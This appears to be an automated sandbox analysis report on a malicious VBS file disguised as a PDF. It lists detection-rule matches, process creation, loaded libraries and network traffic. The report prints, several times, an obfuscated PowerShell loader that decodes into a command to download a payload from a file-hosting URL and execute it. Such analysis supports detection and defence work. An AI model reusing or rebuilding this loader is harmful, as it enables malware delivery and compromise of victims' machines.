Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.com
Source: unknown; Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49704

        System Summary

Source: amsi64_7432.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. 
Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejt
        Source: 11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs Initial sample: Strings found which are bigger than 50
        Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7222
        Source: amsi64_7432.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@4/4@2/2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Maskes.lea
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uv2plouf.aj4.ps1
        Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs"
        Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. 
Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejt
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[ source: powershell.exe, 00000008.00000002.1469063176.000001D3DC814000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: .pdbn8 source: powershell.exe, 00000008.00000002.1468594433.000001D3DC68A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: powershell.exe, 00000008.00000002.1469063176.000001D3DC814000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: .pdbc source: powershell.exe, 00000008.00000002.1467868806.000001D3DC610000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: scorlib.pdb= source: powershell.exe, 00000008.00000002.1467868806.000001D3DC610000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: U'n.pdb source: powershell.exe, 00000008.00000002.1469726606.000001D3DC872000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#", "0")
        Source: Yara match File source: 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Nedfldelig72) if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView") {
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. 
Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejt
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF7C0C90983 push E95B3DD0h; ret 8_2_00007FF7C0C909C9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF7C0C9122D pushad ; retf 8_2_00007FF7C0C91232
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF7C0C900BD pushad ; iretd 8_2_00007FF7C0C900C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF7C0D64DC9 push ebx; ret 8_2_00007FF7C0D64F5A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF7C0D62D30 push eax; retf 8_2_00007FF7C0D62D31
        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
